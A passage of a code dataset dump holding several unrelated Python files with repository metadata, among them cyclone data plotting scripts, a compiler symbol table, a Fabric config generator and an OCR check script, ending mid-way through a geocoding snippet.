"github-code", "pt": "61", "api": [{"api_name": "django.test.TestCase", "line_number": 11, "usage_type": "name"}, {"api_name": "tasks.models.SimpleTask.objects.get", "line_number": 15, "usage_type": "call"}, {"api_name": "tasks.models.SimpleTask.objects", "line_number": 15, "usage_type": "attribute"}, {"api_name": "tasks.models.SimpleTask", "line_number": 15, "usage_type": "name"}, {"api_name": "tasks.models.TaskList.objects.get", "line_number": 18, "usage_type": "call"}, {"api_name": "tasks.models.TaskList.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "tasks.models.TaskList", "line_number": 18, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.create_user", "line_number": 23, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 23, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 23, "usage_type": "name"}, {"api_name": "tasks.models.TaskList.objects.create", "line_number": 26, "usage_type": "call"}, {"api_name": "tasks.models.TaskList.objects", "line_number": 26, "usage_type": "attribute"}, {"api_name": "tasks.models.TaskList", "line_number": 26, "usage_type": "name"}, {"api_name": "tasks.models.SimpleTask.objects.create", "line_number": 29, "usage_type": "call"}, {"api_name": "tasks.models.SimpleTask.objects", "line_number": 29, "usage_type": "attribute"}, {"api_name": "tasks.models.SimpleTask", "line_number": 29, "usage_type": "name"}, {"api_name": "datetime.date.today", "line_number": 31, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 31, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 33, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 33, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 37, "usage_type": "call"}, {"api_name": "matrix.views.coveys_matrix_page", "line_number": 37, "usage_type": "argument"}, {"api_name": "matrix.views.coveys_matrix_page", "line_number": 38, "usage_type": "argument"}, {"api_name": "django.urls.resolve", "line_number": 38, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 41, "usage_type": "call"}, {"api_name": "matrix.views.covey_sort_backlog", "line_number": 41, "usage_type": "argument"}, {"api_name": "matrix.views.covey_sort_backlog", "line_number": 42, "usage_type": "argument"}, {"api_name": "django.urls.resolve", "line_number": 42, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 45, "usage_type": "call"}, {"api_name": "matrix.views.update_matrix_task", "line_number": 45, "usage_type": "argument"}, {"api_name": "matrix.views.update_matrix_task", "line_number": 46, "usage_type": "argument"}, {"api_name": "django.urls.resolve", "line_number": 46, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 49, "usage_type": "call"}, {"api_name": "matrix.views.retire_task_from_matrix", "line_number": 49, "usage_type": "argument"}, {"api_name": "matrix.views.retire_task_from_matrix", "line_number": 50, "usage_type": "argument"}, {"api_name": "django.urls.resolve", "line_number": 50, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 53, "usage_type": "call"}, {"api_name": "matrix.views.change_matrix_task_state", "line_number": 53, "usage_type": "argument"}, {"api_name": "matrix.views.change_matrix_task_state", "line_number": 54, "usage_type": "argument"}, {"api_name": "django.urls.resolve", "line_number": 54, "usage_type": "call"}]} 
+{"seq_id": "31225365511", "text": "from collections import deque\n\nfood = deque([int(x) for x in input().split(\", \")])\nstamina = deque([int(x) for x in input().split(\", \")])\nmountain_peaks = deque([[\"Vihren\", 80],\n [\"Kutelo\", 90],\n [\"Banski Suhodol\", 100],\n [\"Polezhan\", 60],\n [\"Kamenitza\", 70],\n ])\n\nmountain = []\n\nfor _ in range(7):\n current_food = food.pop()\n current_stamina = stamina.popleft()\n\n power = current_food + current_stamina\n\n if power >= mountain_peaks[0][1]:\n mountain.append(mountain_peaks.popleft()[0])\n\n if len(mountain) == 5:\n print(\"Alex did it! He climbed all top five Pirin peaks in one week -> @FIVEinAWEEK\")\n break\nelse:\n print(\"Alex failed! He has to organize his journey better next time -> @PIRINWINS\")\n\nif mountain:\n print(\"Conquered peaks:\")\n print(*mountain, sep=\"\\n\")\n", "repo_name": "Iliyan-H-Iliev/Python", "sub_path": "Advanced/Exam Preparation/Climb the Peaks.py", "file_name": "Climb the Peaks.py", "file_ext": "py", "file_size_in_byte": 925, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "collections.deque", "line_number": 3, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 4, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 5, "usage_type": "call"}]} +{"seq_id": "35316113195", "text": "import yaml\nimport json\nimport copy\nimport pyaml\nimport sys\n\n\n\nyaml.SafeDumper.ignore_aliases = lambda *args: True\n\ndef create_crypto(jsonData):\n print(\"\")\n print(\"Generating crypto-config...\")\n sys.stdout.flush()\n\n with open(\"./network/template/crypto-config-template.yaml\") as f:\n crypto_doc = yaml.load(f)\n\n peerOrgsArr = create_crypto_orgs(jsonData,crypto_doc)\n ordrArr = create_crypto_ordr(jsonData,crypto_doc)\n\n crypto_doc[\"PeerOrgs\"]=peerOrgsArr\n crypto_doc[\"OrdererOrgs\"][0][\"Specs\"] = ordrArr\n\n with open(\"./network/crypto-config.yaml\", \"w+\") as f:\n pyaml.dump(crypto_doc, f, vspacing=[2, 1])\n\n\ndef create_crypto_orgs(jsonData, crypto_doc):\n n_user = 1 # Hardocded for now\n peerOrgsArr = []\n for org in jsonData[\"organizations\"][\"peerOrgs\"]:\n peerOrgs = copy.deepcopy(crypto_doc[\"PeerOrgs\"][0])\n \n org_name = org[\"name\"]\n org_peer_count = org[\"count\"]\n org_url = org[\"url\"]\n\n peerOrgs[\"Name\"] = org_name.lower().capitalize()\n peerOrgs[\"Domain\"] = org_url\n peerOrgs[\"EnableNodeOUs\"] = True\n peerOrgs[\"Template\"][\"Count\"] = org_peer_count\n peerOrgs[\"Users\"][\"Count\"] = n_user\n peerOrgsArr.append(peerOrgs)\n \n return peerOrgsArr\n \ndef create_crypto_ordr(jsonData, crypto_doc):\n ordrArr = []\n\n for ordr in jsonData[\"organizations\"][\"ordererOrg\"][\"url\"]:\n ordrSpec = copy.deepcopy(crypto_doc[\"OrdererOrgs\"][0][\"Specs\"][0])\n ordrSpec[\"Hostname\"] = ordr.split(\".\")[0]\n ordrArr.append(ordrSpec)\n \n return ordrArr", "repo_name": "aditya520/fabric-starter", "sub_path": "scripts/create_crypto_config.py", "file_name": "create_crypto_config.py", "file_ext": "py", "file_size_in_byte": 1579, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "yaml.SafeDumper", "line_number": 9, "usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 14, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 14, "usage_type": "attribute"}, {"api_name": "yaml.load", "line_number": 17, "usage_type": "call"}, {"api_name": "pyaml.dump", 
"line_number": 26, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 33, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 52, "usage_type": "call"}]} +{"seq_id": "41601456773", "text": "from listener import MouseButtonListener, MediaKeyListener\nfrom volume_notification import VolumeNotification\n\nfrom Xlib import display\nfrom threading import Thread\nimport sys\n\nimport json\nimport os\nfrom xdg import BaseDirectory\n\ntry:\n import gtk\n import pygtk\n import pynotify\n pygtk.require('2.0')\nexcept:\n print(\"Error: need python-notify, python-gtk2 and gtk\")\n\n__version__ = \"2.0.0\"\n\nconfig_file = os.path.join(BaseDirectory.xdg_config_home,\n \"volctl2/settings.json\")\nif os.path.exists(config_file):\n config = json.load(open(config_file))\n cardindex = config[\"cardindex\"]\nelse:\n cardindex = 0\n\n\nclass GtkThread(Thread):\n \"\"\"\n This thread needs to run separately to handle button clicks on the volume\n \"\"\"\n def __init__(self):\n super(GtkThread, self).__init__()\n gtk.gdk.threads_init()\n\n def run(self):\n gtk.main()\n\n\ndef run():\n print(\"Volume Control v{}\".format(__version__))\n\n if not pynotify.init(\"Volume Control v{}\".format(__version__)):\n sys.exit(1)\n\n if not display.Display().has_extension(\"RECORD\"):\n print(\"RECORD extension not found\")\n sys.exit(1)\n\n notification = VolumeNotification(cardindex=cardindex)\n MouseButtonListener(notification).start()\n MediaKeyListener(notification).start()\n GtkThread().start()\n\n\nif __name__ == \"__main__\":\n run()\n", "repo_name": "WhyNotHugo/volctl2", "sub_path": "volctl2/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 1390, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pygtk.require", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "xdg.BaseDirectory.xdg_config_home", "line_number": 22, "usage_type": "attribute"}, {"api_name": "xdg.BaseDirectory", "line_number": 22, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 25, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 31, "usage_type": "name"}, {"api_name": "gtk.gdk.threads_init", "line_number": 37, "usage_type": "call"}, {"api_name": "gtk.gdk", "line_number": 37, "usage_type": "attribute"}, {"api_name": "gtk.main", "line_number": 40, "usage_type": "call"}, {"api_name": "pynotify.init", "line_number": 46, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 47, "usage_type": "call"}, {"api_name": "Xlib.display.Display", "line_number": 49, "usage_type": "call"}, {"api_name": "Xlib.display", "line_number": 49, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 51, "usage_type": "call"}, {"api_name": "volume_notification.VolumeNotification", "line_number": 53, "usage_type": "call"}, {"api_name": "listener.MouseButtonListener", "line_number": 54, "usage_type": "call"}, {"api_name": "listener.MediaKeyListener", "line_number": 55, "usage_type": "call"}]} +{"seq_id": "44395444107", "text": "import numpy as np\r\nimport os\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib as mpl\r\nimport warnings\r\nimport xarray as xr\r\n# from scipy.signal import 
find_peaks\r\nfrom matplotlib import cm\r\nfrom matplotlib.colors import ListedColormap\r\n\r\n\r\nos.chdir( \"/Users/etmu9498/research/code/scripts\")\r\nimport make_plots\r\nimport tc_metadata\r\nimport helper_fns\r\n\r\n# this is an attempt to get clip_old_data to load...\r\nimport sys\r\nsys.path.append(\"/Users/etmu9498/research/code/scripts/in-situ-scripts/\")\r\nos.chdir( \"/Users/etmu9498/research/code/scripts/in-situ-scripts/\")\r\nimport load_in_situ_data\r\nimport clip_old_data\r\n\r\n\r\ndef plot_multi_passes( tc='all'):\r\n\r\n # put tcname into a list to make the for loop work correctly\r\n if tc == 'all':\r\n tcname_list = ['grace', 'henri', 'ida', 'sam']\r\n else:\r\n tcname_list = [ tc]\r\n\r\n for tcname in tcname_list:\r\n warnings.filterwarnings(\"ignore\")\r\n\r\n metadata = tc_metadata.all_data( tcname)\r\n if metadata == 'selected TC name is not yet implemented':\r\n print( metadata)\r\n return\r\n\r\n print( \"\\nTC \" + metadata['tc_name'])\r\n print( 'Number of crl files: ' + str( len( metadata['xlims'] ))+ '\\n')\r\n\r\n for dataset in range( len( metadata[ 'dates'] )):\r\n\r\n if metadata[ 'xlims'] [ dataset][0] > 0.0:\r\n axis = 'lat'\r\n else:\r\n axis = 'lon'\r\n\r\n # load data\r\n os.chdir( metadata['crl_path'] )\r\n crl_data = tc_metadata.choose_crl_date( metadata['dates'][dataset], metadata['crl_list'] )\r\n\r\n os.chdir( metadata['in_situ_path'] )\r\n in_situ_data = tc_metadata.choose_in_situ_date( metadata['dates'][dataset], metadata['in_situ_list'] )\r\n\r\n # xlims = [ metadata['xlims'][dataset][0], metadata['xlims'][dataset][1] ]\r\n xname = metadata['xtype'][dataset]\r\n xlim = metadata['xlims'][dataset]\r\n title = \"In Situ Data, TC \" + metadata['tc_name'] + \", \" + metadata['dates'][ dataset] + \", Eye Pass \" + metadata['eye_pass'][ dataset]\r\n\r\n helper_fns.change_font_sizes()\r\n plot_one_cross_section( metadata['crl_path'], crl_data, metadata['in_situ_path'], in_situ_data, metadata['crl_range'][dataset], axis, xlim, xname, title)\r\n\r\n # save the figure!\r\n os.chdir( \"/Users/etmu9498/research/figures/in-situ-only/\")\r\n plt.savefig( metadata['tc_name'].casefold() + \"-\" + str( dataset+1) + \".png\" )\r\n print( \"Image \" + str( dataset + 1) + \" complete\" )\r\n\r\n\r\n\r\ndef plot_one_cross_section( crl_path, crl_name, flight_data_path, flight_name, cutoff_indices, xaxis, xlim='none', xname='none', title='none'):\r\n\r\n warnings.filterwarnings(\"ignore\")\r\n\r\n # load and process the data\r\n xr_in_situ = load_in_situ_data.load_in_situ( flight_data_path, flight_name, sample_step_size=1)\r\n\r\n # rename variables from xarray for convenience\r\n str_time = xr_in_situ.str_time\r\n float_time = xr_in_situ.float_time\r\n\r\n keyList = [ 'WS.d', 'WD.d', 'UWZ.d', 'ASfmrRainRate.1', 'LATref', 'LONref',\r\n 'TAS.d', 'HT.d', 'TTMref']\r\n # make an empty dict that will be filled soon!\r\n datatrim = {key: None for key in keyList}\r\n\r\n for key in keyList:\r\n datatrim[ key] = clip_old_data.in_situ_helper( crl_path, crl_name, cutoff_indices, xr_in_situ[ key].values, float_time)\r\n\r\n ws, wd, uwz = datatrim['WS.d'], datatrim['WD.d'], datatrim['UWZ.d']\r\n rr, lat, lon = datatrim['ASfmrRainRate.1'], datatrim['LATref'], datatrim['LONref']\r\n tas, height, temp2 = datatrim['TAS.d'], datatrim['HT.d'], datatrim['TTMref']\r\n\r\n if xaxis == \"time\":\r\n xaxis_data = float_time\r\n xlabel = 'Time (UTC, Hours)'\r\n elif xaxis == \"lon\":\r\n xaxis_data = lon\r\n xlabel = 'Longitude (Degrees)'\r\n elif xaxis == \"lat\":\r\n xaxis_data = 
lat\r\n xlabel = 'Latitude (Degrees)'\r\n elif xaxis == 'dist':\r\n print( 'add distance option to in_situ_multi panels if statement!')\r\n return\r\n else:\r\n print( \"Please choose 'lon', 'lat', 'time', or 'dist' as a valid xaxis!\")\r\n\r\n\r\n # find tangential wind speed and p-3 height minima! plot them to compare\r\n wsmin = np.nanmin( ws)\r\n wsmin_ind = np.nanargmin( ws)\r\n\r\n heightmin = np.nanmin( height)\r\n heightmin_ind = np.nanargmin( height)\r\n\r\n fig = plt.figure( figsize=(14, 16) )\r\n ax1 = fig.add_subplot(311)\r\n\r\n ax1.plot( xaxis_data, ws, color='r')\r\n # calling this twice to set ylabel size correctly! doesn't work the first time\r\n ax1.set_ylabel('Tangential Wind Speed (m/s)', color='r')\r\n\r\n # plot vertical lines representing wind speed and height minima\r\n # ax1.axvline( x= xaxis_data[ wsmin_ind], c='r')\r\n # ax1.axvline( x=xaxis_data[ heightmin_ind], c='y')\r\n\r\n ax1.xaxis.grid( )\r\n ax1.yaxis.grid( )\r\n if title != 'none':\r\n ax1.set_title( title)\r\n if xlim != 'none':\r\n ax1.set_xlim( xlim)\r\n\r\n ax2 = ax1.twinx()\r\n ax2.plot( xaxis_data, uwz, color='k')\r\n ax2.set_ylabel('Vertical Wind Speed (m/s)', color='k')\r\n # ax2.set_ylim([-.5, 15])\r\n\r\n ax3 = fig.add_subplot(312)\r\n ax3.plot( xaxis_data, tas, c='darkgreen')\r\n ax3.set_ylabel('P-3 True Air Speed (m/s)', color='g')\r\n ax3.xaxis.grid( )\r\n ax3.yaxis.grid( )\r\n if xlim != 'none':\r\n ax3.set_xlim( xlim)\r\n\r\n ax4 = ax3.twinx()\r\n ax4.plot( xaxis_data, rr, color='b')\r\n ax4.set_ylabel( ' SFMR Rain Rate (mm/hr)', color='b')\r\n\r\n ax5 = fig.add_subplot(313)\r\n ax5.plot( xaxis_data, height, c='y')\r\n ax5.set_ylabel('P-3 Height (m)', c='y')\r\n ax5.xaxis.grid( )\r\n ax5.yaxis.grid( )\r\n # ax5.set_ylim( [ 2500, 3300])\r\n\r\n # plot vertical lines representing wind speed and height minima\r\n # ax5.axvline( x= xaxis_data[ wsmin_ind], c='r')\r\n # ax5.axvline( x=xaxis_data[ heightmin_ind], c='y')\r\n\r\n\r\n ax6 = ax5.twinx()\r\n ax6.plot( xaxis_data, temp2, c='c')\r\n ax6.set_ylabel('Flight Level Temperature (C)', c='c')\r\n\r\n if xlim != 'none':\r\n ax5.set_xlim( xlim)\r\n\r\n # plt.tight_layout()\r\n if xname == 'lon':\r\n ax5.set_xlabel( \"Longitude (Degrees)\")\r\n elif xname == 'time':\r\n ax5.set_xlabel( \"Time (UTC, Hours)\")\r\n elif xname == 'lat':\r\n ax5.set_xlabel( \"Latitude (Degrees)\")\r\n\r\n warnings.filterwarnings(\"ignore\")\r\n\r\n\r\n\r\ndef make_one_subplot( crl_path, crl_name, flight_data_path, flight_name, cutoff_indices, subplot=414):\r\n\r\n warnings.filterwarnings(\"ignore\")\r\n\r\n # load and process the data\r\n\r\n os.chdir( flight_data_path)\r\n xr_in_situ = xr.open_dataset( flight_name)\r\n\r\n # rename variables from xarray for convenience\r\n str_time = xr_in_situ.str_time\r\n float_time = xr_in_situ.float_time\r\n\r\n keyList = [ 'distance', 'WS.d', 'HT.d', 'PSURF.d']\r\n # make an empty dict that will be filled soon!\r\n datatrim = {key: None for key in keyList}\r\n\r\n\r\n for key in keyList:\r\n datatrim[ key] = clip_old_data.in_situ_helper( crl_path, crl_name, cutoff_indices, xr_in_situ[ key].values, float_time)\r\n\r\n xaxis_data, ws, height, psurf = datatrim['distance'], datatrim['WS.d'], datatrim['HT.d'], datatrim['PSURF.d']\r\n\r\n\r\n fig = plt.gcf()\r\n ax1 = fig.add_subplot( subplot)\r\n\r\n ax1.plot( xaxis_data, height, c='y')\r\n ax1.set_ylabel('P-3 Height (m)', c='y')\r\n # ax1.set_ylim( [ 2500, 3300])\r\n ax1.xaxis.grid( )\r\n ax1.yaxis.grid( )\r\n\r\n ax2 = ax1.twinx()\r\n ax2.plot( xaxis_data, ws, c='c')\r\n 
ax2.set_ylabel( 'Wind Speed (m/s)', c='c')\r\n\r\n ax3 = ax1.twinx()\r\n ax3.plot( xaxis_data, psurf, c='r')\r\n ax3.set_ylabel( 'Surface P (hPa)', c='r')\r\n ax3.spines.right.set_position((\"axes\", 1.1))\r\n\r\n\r\n warnings.filterwarnings(\"ignore\")\r\n", "repo_name": "ethanmur/tc-research", "sub_path": "code/scripts/in-situ-scripts/in_situ_multi_panels.py", "file_name": "in_situ_multi_panels.py", "file_ext": "py", "file_size_in_byte": 7735, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.chdir", "line_number": 12, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 19, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 20, "usage_type": "call"}, {"api_name": "warnings.filterwarnings", "line_number": 34, "usage_type": "call"}, {"api_name": "tc_metadata.all_data", "line_number": 36, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 52, "usage_type": "call"}, {"api_name": "tc_metadata.choose_crl_date", "line_number": 53, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 55, "usage_type": "call"}, {"api_name": "tc_metadata.choose_in_situ_date", "line_number": 56, "usage_type": "call"}, {"api_name": "helper_fns.change_font_sizes", "line_number": 63, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "warnings.filterwarnings", "line_number": 75, "usage_type": "call"}, {"api_name": "load_in_situ_data.load_in_situ", "line_number": 78, "usage_type": "call"}, {"api_name": "clip_old_data.in_situ_helper", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.nanmin", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.nanargmin", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.nanmin", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.nanargmin", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "warnings.filterwarnings", "line_number": 181, "usage_type": "call"}, {"api_name": "warnings.filterwarnings", "line_number": 187, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 191, "usage_type": "call"}, {"api_name": "xarray.open_dataset", "line_number": 192, "usage_type": "call"}, {"api_name": "clip_old_data.in_situ_helper", "line_number": 204, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 209, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 209, "usage_type": "name"}, {"api_name": "warnings.filterwarnings", "line_number": 228, "usage_type": "call"}]} +{"seq_id": "22757105691", "text": "\"\"\"SymbolTable class for static semantic analyzer.\n\nTypical usage example:\n new_st = SymbolTable(new_cio)\n st_instance.enter_scope()\n st_instance.exit_scope()\n se_instance.enter_symbol(\"column_index\", \"const\")\n se_instance.enter_symbol(\"x\")\n se_instance.find_symbol(\"j\")\n\"\"\"\n\nfrom typing import Dict, List\nimport chario\nfrom symbol_entry import SymbolEntry as SymEnt\n\n\nclass SymbolTable(object):\n \"\"\"A stack of dictionaries containing identifier information.\n\n Attributes:\n stack: A list of 
dictionaries with string keys and SymbolEntry values.\n level: An integer representing current scope level.\n chario: A Chario instance for error submission.\n \"\"\"\n\n def __init__(self, cio: chario.Chario) -> None:\n \"\"\"Init with Chario instance.\"\"\"\n self.stack: List[Dict[str, SymEnt]] = list()\n self.level: int = -1\n self.chario: chario.Chario = cio\n\n def enter_scope(self) -> None:\n \"\"\"Increment level attribute and push new symbol table onto stack.\n\n Print level number if given verbose option.\n \"\"\"\n self.stack.append(dict())\n self.level += 1\n if self.chario.is_verbose:\n print(\"*** Entered level {}\".format(self.level))\n\n def exit_scope(self) -> None:\n \"\"\"Decrement level attribute and pop last symbol table in stack.\n\n Print level number and symbol table if given verbose option.\n \"\"\"\n table: Dict[str, SymEnt] = self.stack.pop()\n if self.chario.is_verbose:\n self.__print_table(table)\n print(\"*** Exited level {}\".format(self.level))\n self.level -= 1\n\n def __print_table(self, table: Dict[str, SymEnt]) -> None:\n \"\"\"Print contents of a single symbol table.\n\n Args:\n table: A dictionary with string keys and SymbolEntry values.\n \"\"\"\n print(\"*** Symbol table for level {}\".format(self.level))\n for s in table.values():\n print(s)\n\n def enter_symbol(self, key: str, role: str = None) -> SymEnt:\n \"\"\"Enter new symbol into current symbol table.\n\n Add error to Chario instance if the symbol was already declared.\n\n Args:\n key: A string of identifier name.\n role: A string of identifier role.\n\n Returns:\n A SymbolEntry instance for the newly added identifier, or None on redeclaration.\n \"\"\"\n table: Dict[str, SymEnt] = self.stack[-1]\n if key in table:\n self.chario.put_error(\"Identifier already declared in this block.\")\n return None\n else:\n s: SymEnt = SymEnt(key, role) if role else SymEnt(key)\n table[key] = s\n return s\n\n def find_symbol(self, key: str) -> SymEnt:\n \"\"\"Find symbol in the stack of symbol tables, innermost scope first.\n\n Add error to Chario instance if the symbol was never declared.\n\n Args:\n key: A string of identifier name.\n\n Returns:\n A SymbolEntry instance corresponding to the identifier, or None if undeclared.\n \"\"\"\n for i in range(len(self.stack) - 1, -1, -1):\n table: Dict[str, SymEnt] = self.stack[i]\n if key in table:\n return table[key]\n self.chario.put_error(\"Undeclared identifier\")\n return None\n", "repo_name": "clearjade-kr/pl_project_copy", "sub_path": "build/5_P2_source/symbol_table.py", "file_name": "symbol_table.py", "file_ext": "py", "file_size_in_byte": 3292, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "chario.Chario", "line_number": 26, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 28, "usage_type": "name"}, {"api_name": "symbol_entry.SymbolEntry", "line_number": 28, "usage_type": "name"}, {"api_name": "chario.Chario", "line_number": 30, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 47, "usage_type": "name"}, {"api_name": "symbol_entry.SymbolEntry", "line_number": 47, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 53, "usage_type": "name"}, {"api_name": "symbol_entry.SymbolEntry", "line_number": 53, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 75, "usage_type": "name"}, {"api_name": "symbol_entry.SymbolEntry", "line_number": 75, "usage_type": "name"}, {"api_name": 
"symbol_entry.SymbolEntry", "line_number": 80, "usage_type": "name"}, {"api_name": "symbol_entry.SymbolEntry", "line_number": 63, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 96, "usage_type": "name"}, {"api_name": "symbol_entry.SymbolEntry", "line_number": 96, "usage_type": "name"}, {"api_name": "symbol_entry.SymbolEntry", "line_number": 84, "usage_type": "name"}]} +{"seq_id": "1812058221", "text": " \ntry:\n from PIL import Image\nexcept ImportError:\n import Image\nimport pytesseract\nimport sys\nimport configparser\nimport os\nimport cv2\n\nimport re\n#-- include('examples/showgrabfullscreen.py') --#\nimport pyscreenshot as ImageGrab\n\nimport configparser\nfrom configparser import ConfigParser\n\ndef contem(texto, busca):\n if texto.rfind(busca) != -1:\n return True\n else:\n return False\n \n\nconfig = configparser.ConfigParser()\nconfig.read('files/configuracoes.ini')\nparser = ConfigParser()\nparser.read('files/configuracoes.ini') \n\nimg = cv2.imread(r'files/temp/saebi05.png')\nimagem = cv2.bitwise_not(img) \n\nsas24 = str(config['checagens']['sas24'])\nsas08 = str(config['checagens']['sas08'])\nsrtbi01 = str(config['checagens']['srtbi01'])\n\n\ntext = pytesseract.image_to_string(Image.fromarray(imagem),lang='por', config=\"--user-words files/words.txt\")\n\ntext = text.replace(\"\\n\",\"\")\ntext = text.lower()\nprint(text)\nprint('\\n\\n\\n>\\n\\n\\n')\n\n#Checagem Sas24\nif contem(text, '675 - sasbu24'):\n print('SAS24') \n\n#Checagem sas08\nelif contem(text, '700 - sasbi'): \n print('SAS08') \n\n#Checagem Srtbi01\nelif contem(text, '1125 - srtbi'): \n print('SRTBI01') \n\n#Checagem saebi05\nelif contem(text, '1450 - saebi'):\n print('saebi05')\nprint(\"\\n\\n numeros:\")\n\ntext = text.replace(\".\",\"\")\ntext = text.replace(\",\",\".\")\nprint(text)\nprint('\\n\\n\\n>\\n\\n\\n')\n\nsaebi05 = float(re.findall(\"\\d+\\.\\d+\", text)[0])\n\nprint('saebi05 :',saebi05)\n \n\nif(saebi05 < 500):\n print(\"checagem Valida !\")\nelse:\n print(\"checagem invalida\")\n\n\nos.system(\"pause\")", "repo_name": "MateusAlvarenga/BatchSlave", "sub_path": "BatchSlave2/testechecagens.py", "file_name": "testechecagens.py", "file_ext": "py", "file_size_in_byte": 1609, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "configparser.ConfigParser", "line_number": 26, "usage_type": "call"}, {"api_name": "configparser.ConfigParser", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 31, "usage_type": "call"}, {"api_name": "cv2.bitwise_not", "line_number": 32, "usage_type": "call"}, {"api_name": "pytesseract.image_to_string", "line_number": 39, "usage_type": "call"}, {"api_name": "Image.fromarray", "line_number": 39, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 68, "usage_type": "call"}, {"api_name": "os.system", "line_number": 79, "usage_type": "call"}]} +{"seq_id": "1673082129", "text": "import os\r\nimport cv2\r\n\r\nclass NNService:\r\n\r\n def __init__(self):\r\n nn_model_file = os.path.join('.', 'src', 'model', 'MobileNetSSD_deploy.caffemodel') \r\n nn_proto_file = os.path.join('.', 'src', 'model', 'MobileNetSSD_deploy.prototxt.txt') \r\n\r\n self.neural_network = cv2.dnn.readNetFromCaffe(nn_proto_file, nn_model_file)\r\n print (\"NNService created\")\r\n\r\n def detect (self, frame):\r\n print (f\"NNService REQUEST PARAMS: frame {frame.shape}\")\r\n frame = cv2.resize(frame, (300, 300))\r\n blob = cv2.dnn.blobFromImage(frame, 0.007843, (300, 
300), 127.5)\r\n self.neural_network.setInput(blob)\r\n detections = self.neural_network.forward()\r\n print('NNService RESPONSE Success')\r\n return detections\r\n", "repo_name": "programmerkz/NN_detectors_over_gRPC", "sub_path": "src/nn_service.py", "file_name": "nn_service.py", "file_ext": "py", "file_size_in_byte": 773, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.join", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "cv2.dnn.readNetFromCaffe", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.dnn", "line_number": 10, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.dnn.blobFromImage", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.dnn", "line_number": 16, "usage_type": "attribute"}]} +{"seq_id": "45119885320", "text": "import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport requests\nimport pprint\nfrom sklearn.cluster import KMeans\nimport folium\n\ndata = pd.read_excel(file_path)\naddress_list = data['주소지'].tolist()\nprint(address_list)\n\nlocations_lat = [];\nlocations_lng = [];\n\nfor addr in address_list:\n URL = 